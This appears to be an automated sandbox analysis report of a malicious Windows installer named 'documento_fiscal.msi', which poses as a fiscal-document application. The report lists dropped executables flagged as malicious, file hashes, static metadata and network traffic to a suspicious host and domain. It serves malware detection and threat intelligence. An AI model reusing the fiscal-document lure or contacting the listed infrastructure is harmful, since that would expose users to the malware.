SSDEEP:	24576:x/EEimJH6g7scSzMQDC5lfCT/EEimJH6g7scSzMQDC5lfCj:tOmJH6g7sJzM+C5ZCzOmJH6g7sJzM+CC
MD5:	7271BD0F6056749EE83925C8C599808B
SHA1:	94BCFD82EF802B59538C73DCB8F9C16C6E4D9746
SHA-256:	BF6BCC2886DFD58520E25FD35766202EE2470DB93F0D033BCF0A0B8B232CD52F
SHA-512:	1199B3A7673DF480534A1541322D6F4FD8994FCB09B563CEE7BFB025E6EAFA2087F502DE6E89EA367AE9F5BEEDEE9D2C1D039ACC92FBB2D973B22110A229D007
Malicious:	false
Preview:	...@IXOS.@.....@b?.Y.@.....@.....@.....@.....@.....@......&.{84A29AC3-6CE2-4D4C-A459-E583C2AFC8C9}..Aplicativo Windows..documento_fiscal.msi.@.....@?....@.....@........&.{36B01411-86F7-4A5B-B71C-E30003C2B666}.....@.....@.....@.....@.......@.....@.....@.......@......Aplicativo Windows......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]...@.......@........ProcessComponents%.Atualizando o registro de componentes...@.....@.....@.]....&.{60715A9F-4AEC-4D83-B87A-914CE6AF84AD}..C:\Users\user\Documents\.@.......@.....@.....@......&.{232B65CE-07F2-4C09-8446-D0B152043BFA}1.01:\Software\Microsoft\Aplicativo Windows\Version.@.......@.....@.....@......&.{22B4B4EB-20D3-4CCD-A51F-EBD421917779}..01:\Microsoft\.@.......@.....@.....@......&.{3A6531DD-7594-4904-AAB9-32F10FD461DF}..01:\Microsoft\Windows\.@.......@.....@.....@......&.{4669957E-4874-4408-AF9D-19502B394F45}%.01:\Microsoft\Windows\CurrentVersion\.@.......@.....@.....@......&.{5

C:\Windows\Installer\MSI892F.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	423936
Entropy (8bit):	6.554049394581909
Encrypted:	false
SSDEEP:	12288:B/ePEitwJH6g7scgFzMzMHf7h453V6hEFM:B/EEimJH6g7scSzMQDC5lfC
MD5:	768B35409005592DE2333371C6253BC8
SHA1:	E370B3CFD801FCDFDBEEC90B0F7CBEF5D2E6B69C
SHA-256:	33B519696A7F4B5D4714E3A363B0F0F76E6FF576A05999E482EA484AD4ACF5A5
SHA-512:	BB8FAE0FDCE3D61DAB48C1F79F3CE498159364D51FDFD2481CCA3A60D009F6134194D48EA20DE3E1F0C236BB9F6368F82D737A8153F7A1D492F44E197EA971CE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........5.g[..g[..g[.T.X..g[.T.^.)g[.8._..g[.8.X..g[.8.^..g[.T._..g[.T.]..g[.T.Z..g[..gZ.Kg[.^.R..g[.^....g[..g..g[.^.Y..g[.Rich.g[.................PE..L...s,Jd.........."....#..........................@.................................._....@..........................................p..8........................:..(...p...........................h...@...............l............................text.............................. ..`.rdata...R.......T..................@..@.data....7...0......................@....rsrc...8....p.......0..............@..@.reloc...:.......<...<..............@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI894F.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	423936
Entropy (8bit):	6.554049394581909
Encrypted:	false
SSDEEP:	12288:B/ePEitwJH6g7scgFzMzMHf7h453V6hEFM:B/EEimJH6g7scSzMQDC5lfC
MD5:	768B35409005592DE2333371C6253BC8
SHA1:	E370B3CFD801FCDFDBEEC90B0F7CBEF5D2E6B69C
SHA-256:	33B519696A7F4B5D4714E3A363B0F0F76E6FF576A05999E482EA484AD4ACF5A5
SHA-512:	BB8FAE0FDCE3D61DAB48C1F79F3CE498159364D51FDFD2481CCA3A60D009F6134194D48EA20DE3E1F0C236BB9F6368F82D737A8153F7A1D492F44E197EA971CE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........5.g[..g[..g[.T.X..g[.T.^.)g[.8._..g[.8.X..g[.8.^..g[.T._..g[.T.]..g[.T.Z..g[..gZ.Kg[.^.R..g[.^....g[..g..g[.^.Y..g[.Rich.g[.................PE..L...s,Jd.........."....#..........................@.................................._....@..........................................p..8........................:..(...p...........................h...@...............l............................text.............................. ..`.rdata...R.......T..................@..@.data....7...0......................@....rsrc...8....p.......0..............@..@.reloc...:.......<...<..............@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Installer\SourceHash{84A29AC3-6CE2-4D4C-A459-E583C2AFC8C9}

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.1669248224333133
Encrypted:	false
SSDEEP:	12:JSbX72FjY/iAGiLIlHVRp3h/7777777777777777777777777vDHFiMaLpY1l0i5:J1QI5zY08F
MD5:	F226DA8A5B273F487FAE5057A6864CFE
SHA1:	0EE51072FCD7A48E21CCDD649BE012C644091E7A
SHA-256:	BA4592AC4520991CF5D92282A1CA6E4E48B8E58A4F9B43AE019EA6A09B02E2BB
SHA-512:	48BD70BEF6DF3FCFF888B88F2619C3B76B238994DF67D2A48FB12B4019569CB1A17512832689DFE08DB86C292A8028C2F785B1A66E0ECB34CCECC75525CE6B83
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.4883411840669762
Encrypted:	false
SSDEEP:	48:X8PhYuRc06WXJIjT5KKE6rISCrKAECiCyjMHoOrISCrAT:WhY1rjTS+IrREC0MZIr
MD5:	CAFE18E811837DE8DCEB53AB157D2271
SHA1:	75A12162DA08FA626829045778CE8E288E407C7E
SHA-256:	EE3527C90873A4030C67CA44FA3307146A92FC36A66776907C0411988150EE0F
SHA-512:	C07F8E36B6D6D8CB7DA3B5963A1605F292098A9077DF20BCABFA193766B3BC36CB6359F12C6A882B2D86EC2D06B3993D1B8B4721DB59348BA6C6965FF19415FF
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	432221
Entropy (8bit):	5.375173576482147
Encrypted:	false
SSDEEP:	1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgau0:zTtbmkExhMJCIpErN
MD5:	405B36E6E71C33362978AE0FAA04B3E0
SHA1:	DE6A51FF6B3AF4B91202BB8AA51A43692E668779
SHA-256:	C98468B92998763E0C3FA92589B9A0635F263CA7B77C82F512AC59C1D19BD1C7
SHA-512:	A10BC6E6805707F2A1568206C6AA92998DAC91D963D1FF5BB7C2C6A2DC6D3FBCF6435D3AB637B84F5F9B7E015715A593A7D1E96957791E3387F61FD5B5BC499B
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

C:\Windows\Temp\~DF2A7B608659AA2741.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.1989684775435316
Encrypted:	false
SSDEEP:	48:TnQuGI+CFXJrT50KE6rISCrKAECiCyjMHoOrISCrAT:LQ6DTQ+IrREC0MZIr
MD5:	E4E830EBB58296C905DA1F36F309AAA8
SHA1:	3F0ABE2B7F5840FCFF11ADB2A975F44DA52CA0E3
SHA-256:	C410BB8DA450DBF985A3FD3CB29D0E582E182DEE9343286BDA41AD55ABF00275
SHA-512:	1B42BFBE3851C8961AFB9CF8C5964A0A1E18CE166530376D20FE1FDEF1C6B193AFB5A68ACC3726CB98C0820F623DBB83D4F8FA801B173722218D3DD8D7225F09
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF370A834B11EC122F.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.1989684775435316
Encrypted:	false
SSDEEP:	48:TnQuGI+CFXJrT50KE6rISCrKAECiCyjMHoOrISCrAT:LQ6DTQ+IrREC0MZIr
MD5:	E4E830EBB58296C905DA1F36F309AAA8
SHA1:	3F0ABE2B7F5840FCFF11ADB2A975F44DA52CA0E3
SHA-256:	C410BB8DA450DBF985A3FD3CB29D0E582E182DEE9343286BDA41AD55ABF00275
SHA-512:	1B42BFBE3851C8961AFB9CF8C5964A0A1E18CE166530376D20FE1FDEF1C6B193AFB5A68ACC3726CB98C0820F623DBB83D4F8FA801B173722218D3DD8D7225F09
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF59FBD696BCEF3E6D.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.4883411840669762
Encrypted:	false
SSDEEP:	48:X8PhYuRc06WXJIjT5KKE6rISCrKAECiCyjMHoOrISCrAT:WhY1rjTS+IrREC0MZIr
MD5:	CAFE18E811837DE8DCEB53AB157D2271
SHA1:	75A12162DA08FA626829045778CE8E288E407C7E
SHA-256:	EE3527C90873A4030C67CA44FA3307146A92FC36A66776907C0411988150EE0F
SHA-512:	C07F8E36B6D6D8CB7DA3B5963A1605F292098A9077DF20BCABFA193766B3BC36CB6359F12C6A882B2D86EC2D06B3993D1B8B4721DB59348BA6C6965FF19415FF
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF6ABD27FC03A05FF1.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF81316409EB68594F.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	0.109047228654931
Encrypted:	false
SSDEEP:	24:jv3HiscTxkrIipVkrSkrIipVkrKAEVkryjCyjMHV2BwGERR+USK:8TerISCr9rISCrKAECiCyjMHo2oK
MD5:	7ED7326E771A12D5501B573DCD5B3269
SHA1:	199F32AF6527FB49596E3A99626431C6E5706ECE
SHA-256:	3781F15E17FFE59316F1E236F4F5F77B01013E2C359CD36031047ABFFD523F8E
SHA-512:	88D982EB5618B8404B09BEA4EDDFF7C7619ECD20FD6A342F26CB01C5BC55BA4CD2F69F3AF2A7D555D090DDAD60CECC12CC6EF221B4E3571E36179042B864CFA0
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF847F287C7DBECA03.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFCAC885D742FE489B.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.07392703441912957
Encrypted:	false
SSDEEP:	6:2/9LG7iVCnLG7iVrKOzPLHKOi8LbDGnL1YVky6lYt/:2F0i8n0itFzDHFiMaLpY1
MD5:	D200F0FD6645D05419C270B97B5055D9
SHA1:	0E8DC1712FD1791E1BF23B00862057316965D878
SHA-256:	9A204B5CC3B342E1EFFB2C561AEBD27423CF0C6830490960EC175F5B0D3D8E8D
SHA-512:	35DC54C7E12F6B4BA7FD14ADDF55AFDD90AB0CD9032B10208D6C042447E6C01B9451AE295A652C6DDCFC6F1FECF1BFE126636C1895A426552B543DE44E5AE01A
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFE0A128FCD48E61FE.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Chrome Cache Entry: 186

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	287
Entropy (8bit):	5.206271659097044
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoIRCw+A3RgcXaoD:J0+oxBeRmR9etdzRxGezHtama+
MD5:	857DE98C50DA1BF6AE679FA309999806
SHA1:	7B4C03FD3C783923619494EA80A068A228E99A8E
SHA-256:	DFD192B0E392C17D6DBF99E1A994F8BD9B08AEA45A2DFBA83015FAB06B8990AD
SHA-512:	5DF246B317BFBBF0A8A1FC070CC56A488EE10F44C87823C5A28861AC96C7231AC39ED78C0D583C57B2BF153DBE1F6350C341763347ED41CFFF508FCA17BE502D
Malicious:	false
URL:	http://senhordos-infects.digital/favicon.ico
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<hr>.<address>Apache/2.4.52 (Ubuntu) Server at senhordos-infects.digital Port 80</address>.</body></html>.

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {36B01411-86F7-4A5B-B71C-E30003C2B666}, Number of Words: 10, Subject: Aplicativo Windows, Author: Microsoft, Name of Creating Application: Aplicativo Windows, Template: ;1046, Comments: Aplicativo Windows, Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Fri Aug 2 19:31:56 2024, Number of Pages: 200
Entropy (8bit):	7.971953576501129
TrID:	Windows SDK Setup Transform Script (63028/2) 47.91% Microsoft Windows Installer (60509/1) 46.00% Generic OLE2 / Multistream Compound File (8008/1) 6.09%
File name:	documento_fiscal.msi
File size:	24'161'280 bytes
MD5:	1f5f238e8fe77c8d8223c447d47af966
SHA1:	d54cef3a2624e20e1ea10d01a93c0ca315ae8d2b
SHA256:	0845f3988ace37d012b1838a5f56193bf46f9844bc7be983c0baa693527fd472
SHA512:	c94a364f670b34cab106612f3bb0511e940176d595662fba1ad9b4d5de7ef61d13bf2127268c5ceb20eac3c66a0335e3a4c8b060b0022b568d7a7d51d2af6cc0
SSDEEP:	393216:GSG9qH2v09bLYik+rU9QmDbPK95lVuqtihjw+aLjvRpXFzhkf:/JPnkUw3a3VDp1zhk
TLSH:	3B373335B6DAC432D41D0177E929EE2E053DAEB3473151E7B7E87DAE88B4CC1A274602
File Content Preview:	........................>...................q.......................'...........G.......c.......u...............................O...P...Q...R...S...T...U...V...W..............................................................................................

File Icon


Icon Hash:	2d2e3797b32b2b99

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 4, 2024 13:58:56.746948957 CEST	49675	443	192.168.2.4	173.222.162.32
Aug 4, 2024 13:59:06.356319904 CEST	49675	443	192.168.2.4	173.222.162.32
Aug 4, 2024 13:59:08.164252043 CEST	49730	80	192.168.2.4	45.178.182.88
Aug 4, 2024 13:59:08.165348053 CEST	49731	80	192.168.2.4	45.178.182.88
Aug 4, 2024 13:59:08.169444084 CEST	80	49730	45.178.182.88	192.168.2.4
Aug 4, 2024 13:59:08.169894934 CEST	49730	80	192.168.2.4	45.178.182.88
Aug 4, 2024 13:59:08.170392036 CEST	80	49731	45.178.182.88	192.168.2.4
Aug 4, 2024 13:59:08.170438051 CEST	49731	80	192.168.2.4	45.178.182.88
Aug 4, 2024 13:59:08.171195030 CEST	49731	80	192.168.2.4	45.178.182.88
Aug 4, 2024 13:59:08.176177979 CEST	80	49731	45.178.182.88	192.168.2.4
Aug 4, 2024 13:59:09.282979012 CEST	80	49731	45.178.182.88	192.168.2.4
Aug 4, 2024 13:59:09.323460102 CEST	49731	80	192.168.2.4	45.178.182.88
Aug 4, 2024 13:59:09.333456039 CEST	49731	80	192.168.2.4	45.178.182.88
Aug 4, 2024 13:59:09.338331938 CEST	80	49731	45.178.182.88	192.168.2.4
Aug 4, 2024 13:59:09.545314074 CEST	80	49731	45.178.182.88	192.168.2.4
Aug 4, 2024 13:59:09.590179920 CEST	49731	80	192.168.2.4	45.178.182.88
Aug 4, 2024 13:59:12.447866917 CEST	49739	443	192.168.2.4	216.58.206.68
Aug 4, 2024 13:59:12.447907925 CEST	443	49739	216.58.206.68	192.168.2.4
Aug 4, 2024 13:59:12.448043108 CEST	49739	443	192.168.2.4	216.58.206.68
Aug 4, 2024 13:59:12.448256969 CEST	49739	443	192.168.2.4	216.58.206.68
Aug 4, 2024 13:59:12.448271990 CEST	443	49739	216.58.206.68	192.168.2.4
Aug 4, 2024 13:59:13.081718922 CEST	443	49739	216.58.206.68	192.168.2.4
Aug 4, 2024 13:59:13.083709955 CEST	49739	443	192.168.2.4	216.58.206.68
Aug 4, 2024 13:59:13.083722115 CEST	443	49739	216.58.206.68	192.168.2.4
Aug 4, 2024 13:59:13.084764957 CEST	443	49739	216.58.206.68	192.168.2.4
Aug 4, 2024 13:59:13.084929943 CEST	49739	443	192.168.2.4	216.58.206.68
Aug 4, 2024 13:59:13.088521957 CEST	49739	443	192.168.2.4	216.58.206.68
Aug 4, 2024 13:59:13.088633060 CEST	443	49739	216.58.206.68	192.168.2.4
Aug 4, 2024 13:59:13.211709023 CEST	49740	443	192.168.2.4	184.28.90.27
Aug 4, 2024 13:59:13.211806059 CEST	443	49740	184.28.90.27	192.168.2.4
Aug 4, 2024 13:59:13.211884022 CEST	49740	443	192.168.2.4	184.28.90.27
Aug 4, 2024 13:59:13.213346004 CEST	49740	443	192.168.2.4	184.28.90.27
Aug 4, 2024 13:59:13.213378906 CEST	443	49740	184.28.90.27	192.168.2.4
Aug 4, 2024 13:59:13.277498960 CEST	49739	443	192.168.2.4	216.58.206.68
Aug 4, 2024 13:59:13.277514935 CEST	443	49739	216.58.206.68	192.168.2.4
Aug 4, 2024 13:59:13.389930010 CEST	49739	443	192.168.2.4	216.58.206.68
Aug 4, 2024 13:59:13.873485088 CEST	443	49740	184.28.90.27	192.168.2.4
Aug 4, 2024 13:59:13.873570919 CEST	49740	443	192.168.2.4	184.28.90.27
Aug 4, 2024 13:59:13.877075911 CEST	49740	443	192.168.2.4	184.28.90.27
Aug 4, 2024 13:59:13.877105951 CEST	443	49740	184.28.90.27	192.168.2.4
Aug 4, 2024 13:59:13.877513885 CEST	443	49740	184.28.90.27	192.168.2.4
Aug 4, 2024 13:59:13.914604902 CEST	49740	443	192.168.2.4	184.28.90.27
Aug 4, 2024 13:59:13.960501909 CEST	443	49740	184.28.90.27	192.168.2.4
Aug 4, 2024 13:59:14.139955997 CEST	443	49740	184.28.90.27	192.168.2.4
Aug 4, 2024 13:59:14.140033960 CEST	443	49740	184.28.90.27	192.168.2.4
Aug 4, 2024 13:59:14.140101910 CEST	49740	443	192.168.2.4	184.28.90.27
Aug 4, 2024 13:59:14.140255928 CEST	49740	443	192.168.2.4	184.28.90.27
Aug 4, 2024 13:59:14.140283108 CEST	443	49740	184.28.90.27	192.168.2.4
Aug 4, 2024 13:59:14.140300035 CEST	49740	443	192.168.2.4	184.28.90.27
Aug 4, 2024 13:59:14.140306950 CEST	443	49740	184.28.90.27	192.168.2.4
Aug 4, 2024 13:59:14.172621012 CEST	49741	443	192.168.2.4	184.28.90.27
Aug 4, 2024 13:59:14.172665119 CEST	443	49741	184.28.90.27	192.168.2.4
Aug 4, 2024 13:59:14.172748089 CEST	49741	443	192.168.2.4	184.28.90.27
Aug 4, 2024 13:59:14.173103094 CEST	49741	443	192.168.2.4	184.28.90.27
Aug 4, 2024 13:59:14.173116922 CEST	443	49741	184.28.90.27	192.168.2.4
Aug 4, 2024 13:59:14.702630043 CEST	80	49731	45.178.182.88	192.168.2.4
Aug 4, 2024 13:59:14.702857018 CEST	49731	80	192.168.2.4	45.178.182.88
Aug 4, 2024 13:59:14.836530924 CEST	443	49741	184.28.90.27	192.168.2.4
Aug 4, 2024 13:59:14.836632967 CEST	49741	443	192.168.2.4	184.28.90.27
Aug 4, 2024 13:59:14.838044882 CEST	49741	443	192.168.2.4	184.28.90.27
Aug 4, 2024 13:59:14.838056087 CEST	443	49741	184.28.90.27	192.168.2.4
Aug 4, 2024 13:59:14.838450909 CEST	443	49741	184.28.90.27	192.168.2.4
Aug 4, 2024 13:59:14.839601040 CEST	49741	443	192.168.2.4	184.28.90.27
Aug 4, 2024 13:59:14.884520054 CEST	443	49741	184.28.90.27	192.168.2.4
Aug 4, 2024 13:59:15.114137888 CEST	443	49741	184.28.90.27	192.168.2.4
Aug 4, 2024 13:59:15.114325047 CEST	443	49741	184.28.90.27	192.168.2.4
Aug 4, 2024 13:59:15.114541054 CEST	49741	443	192.168.2.4	184.28.90.27
Aug 4, 2024 13:59:15.115375996 CEST	49741	443	192.168.2.4	184.28.90.27
Aug 4, 2024 13:59:15.115423918 CEST	443	49741	184.28.90.27	192.168.2.4
Aug 4, 2024 13:59:15.115461111 CEST	49741	443	192.168.2.4	184.28.90.27
Aug 4, 2024 13:59:15.115477085 CEST	443	49741	184.28.90.27	192.168.2.4
Aug 4, 2024 13:59:16.716456890 CEST	49731	80	192.168.2.4	45.178.182.88
Aug 4, 2024 13:59:16.722234964 CEST	80	49731	45.178.182.88	192.168.2.4
Aug 4, 2024 13:59:18.873982906 CEST	49742	443	192.168.2.4	20.114.59.183
Aug 4, 2024 13:59:18.874031067 CEST	443	49742	20.114.59.183	192.168.2.4
Aug 4, 2024 13:59:18.874233007 CEST	49742	443	192.168.2.4	20.114.59.183
Aug 4, 2024 13:59:18.875224113 CEST	49742	443	192.168.2.4	20.114.59.183
Aug 4, 2024 13:59:18.875236988 CEST	443	49742	20.114.59.183	192.168.2.4
Aug 4, 2024 13:59:20.535640001 CEST	443	49742	20.114.59.183	192.168.2.4
Aug 4, 2024 13:59:20.535746098 CEST	49742	443	192.168.2.4	20.114.59.183
Aug 4, 2024 13:59:20.539238930 CEST	49742	443	192.168.2.4	20.114.59.183
Aug 4, 2024 13:59:20.539292097 CEST	443	49742	20.114.59.183	192.168.2.4
Aug 4, 2024 13:59:20.539702892 CEST	443	49742	20.114.59.183	192.168.2.4
Aug 4, 2024 13:59:20.748512983 CEST	443	49742	20.114.59.183	192.168.2.4
Aug 4, 2024 13:59:20.752183914 CEST	49742	443	192.168.2.4	20.114.59.183
Aug 4, 2024 13:59:21.099384069 CEST	49742	443	192.168.2.4	20.114.59.183
Aug 4, 2024 13:59:21.140551090 CEST	443	49742	20.114.59.183	192.168.2.4
Aug 4, 2024 13:59:21.360274076 CEST	443	49742	20.114.59.183	192.168.2.4
Aug 4, 2024 13:59:21.360335112 CEST	443	49742	20.114.59.183	192.168.2.4
Aug 4, 2024 13:59:21.360431910 CEST	49742	443	192.168.2.4	20.114.59.183
Aug 4, 2024 13:59:21.360513926 CEST	443	49742	20.114.59.183	192.168.2.4
Aug 4, 2024 13:59:21.360589027 CEST	49742	443	192.168.2.4	20.114.59.183
Aug 4, 2024 13:59:21.361995935 CEST	443	49742	20.114.59.183	192.168.2.4
Aug 4, 2024 13:59:21.362181902 CEST	443	49742	20.114.59.183	192.168.2.4
Aug 4, 2024 13:59:21.362212896 CEST	49742	443	192.168.2.4	20.114.59.183
Aug 4, 2024 13:59:21.362286091 CEST	49742	443	192.168.2.4	20.114.59.183
Aug 4, 2024 13:59:21.876246929 CEST	49742	443	192.168.2.4	20.114.59.183
Aug 4, 2024 13:59:21.876246929 CEST	49742	443	192.168.2.4	20.114.59.183
Aug 4, 2024 13:59:21.876323938 CEST	443	49742	20.114.59.183	192.168.2.4
Aug 4, 2024 13:59:21.876362085 CEST	443	49742	20.114.59.183	192.168.2.4
Aug 4, 2024 13:59:22.983412981 CEST	443	49739	216.58.206.68	192.168.2.4
Aug 4, 2024 13:59:22.983542919 CEST	443	49739	216.58.206.68	192.168.2.4
Aug 4, 2024 13:59:22.983608007 CEST	49739	443	192.168.2.4	216.58.206.68
Aug 4, 2024 13:59:22.999958038 CEST	49723	80	192.168.2.4	2.16.100.168
Aug 4, 2024 13:59:23.006212950 CEST	80	49723	2.16.100.168	192.168.2.4
Aug 4, 2024 13:59:23.006273031 CEST	49723	80	192.168.2.4	2.16.100.168
Aug 4, 2024 13:59:24.700615883 CEST	49739	443	192.168.2.4	216.58.206.68
Aug 4, 2024 13:59:24.700647116 CEST	443	49739	216.58.206.68	192.168.2.4
Aug 4, 2024 13:59:53.183310032 CEST	49730	80	192.168.2.4	45.178.182.88
Aug 4, 2024 13:59:53.188422918 CEST	80	49730	45.178.182.88	192.168.2.4
Aug 4, 2024 13:59:58.269408941 CEST	49748	443	192.168.2.4	20.114.59.183
Aug 4, 2024 13:59:58.269540071 CEST	443	49748	20.114.59.183	192.168.2.4
Aug 4, 2024 13:59:58.269635916 CEST	49748	443	192.168.2.4	20.114.59.183
Aug 4, 2024 13:59:58.270348072 CEST	49748	443	192.168.2.4	20.114.59.183
Aug 4, 2024 13:59:58.270416975 CEST	443	49748	20.114.59.183	192.168.2.4
Aug 4, 2024 13:59:59.180383921 CEST	443	49748	20.114.59.183	192.168.2.4
Aug 4, 2024 13:59:59.180478096 CEST	49748	443	192.168.2.4	20.114.59.183
Aug 4, 2024 13:59:59.184022903 CEST	49748	443	192.168.2.4	20.114.59.183
Aug 4, 2024 13:59:59.184077024 CEST	443	49748	20.114.59.183	192.168.2.4
Aug 4, 2024 13:59:59.184355974 CEST	443	49748	20.114.59.183	192.168.2.4
Aug 4, 2024 13:59:59.191605091 CEST	49748	443	192.168.2.4	20.114.59.183
Aug 4, 2024 13:59:59.232577085 CEST	443	49748	20.114.59.183	192.168.2.4
Aug 4, 2024 13:59:59.518512964 CEST	443	49748	20.114.59.183	192.168.2.4
Aug 4, 2024 13:59:59.518541098 CEST	443	49748	20.114.59.183	192.168.2.4
Aug 4, 2024 13:59:59.518629074 CEST	443	49748	20.114.59.183	192.168.2.4
Aug 4, 2024 13:59:59.518666029 CEST	49748	443	192.168.2.4	20.114.59.183
